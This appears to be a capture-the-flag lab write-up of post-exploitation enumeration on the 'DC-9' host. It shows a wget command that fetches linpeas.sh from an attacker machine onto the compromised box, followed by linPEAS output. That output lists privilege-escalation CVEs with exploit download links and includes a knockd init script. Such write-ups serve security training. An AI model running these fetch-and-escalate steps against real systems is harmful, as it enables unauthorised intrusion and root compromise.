PEAS
Conducting an automated enumeration after performing a manual enumeration on the dc-9(192.168.207.209) host.
janitor@dc-9:/dev/shm$ wget -q http://192.168.45.247/linpeas.sh ; chmod 755 ./linpeas.shDelivery complete
/Play/DC-9/4-Post_Enumeration/attachments/{C515F453-EE55-4B24-9EFF-FC935CB26E2C}.png)
Executing PEAS
CVE
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2019-13272] PTRACE_TRACEME
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
Exposure: highly probable
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
Comments: Requires an active PolKit agent.
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.knockd
╔══════════╣ Analyzing Knockd Files (limit 70)
-rwxr-xr-x 1 root root 1755 Oct 9 2016 /etc/init.d/knockd
#! /bin/sh
### BEGIN INIT INFO
# Provides: knockd
# Required-Start: $network $syslog $remote_fs
# Required-Stop: $network $syslog $remote_fs
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: port-knock daemon
### END INIT INFO
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
DAEMON=/usr/sbin/knockd
NAME=knockd
PIDFILE=/var/run/$NAME.pid
DEFAULTS_FILE=/etc/default/knockd
DESC="Port-knock daemon"
OPTIONS=" -d"
umask 0037
test -f $DAEMON || exit 0
set -e
[ -f $DEFAULTS_FILE ] && . $DEFAULTS_FILE
. /lib/lsb/init-functions
[ "$KNOCKD_OPTS" ] && OPTIONS="$OPTIONS $KNOCKD_OPTS"
start_if_configured() {
if [ $START_KNOCKD -ne 1 ]; then
log_warning_msg "$NAME disabled: not starting. To enable it edit $DEFAULTS_FILE"
exit 0
else
log_daemon_msg "Starting $DESC" "$NAME"
if ! START_ERROR=`start-stop-daemon --start --oknodo --quiet --exec $DAEMON -- $OPTIONS 2>&1`; then
# don't fail the upgrade if it fails to start
echo -n " "
log_action_end_msg 1 "$START_ERROR"
exit 0
else
log_end_msg 0
fi
fi
}
case "$1" in
start)
start_if_configured
;;
stop)
log_daemon_msg "Stopping $DESC" "$NAME"
start-stop-daemon --stop --oknodo --quiet --exec $DAEMON
log_end_msg 0
;;
restart|reload|force-reload)
log_daemon_msg "Stopping $DESC" "$NAME"
start-stop-daemon --stop --oknodo --quiet --exec $DAEMON
log_end_msg 0
sleep 1
start_if_configured
;;
*)
log_warning_msg "Usage: $0 {start|stop|restart|reload|force-reload}" >&2
exit 1
;;
esac
exit 0Apache
/Play/DC-9/4-Post_Enumeration/attachments/{D4F0C505-10BF-420E-8C2A-9E6A5584DDA1}.png)
Installed Programs
/Play/DC-9/4-Post_Enumeration/attachments/{C5CFE5AC-36C9-4A0C-A3FB-E4ED55AF0BA3}.png)
Compilers
/Play/DC-9/4-Post_Enumeration/attachments/{C1F8216D-5D32-4C81-A464-12321F2C91B0}.png)
/opt Directory
/Play/DC-9/4-Post_Enumeration/attachments/{A765C5FB-8D76-42BE-9F4C-54574806FD39}.png)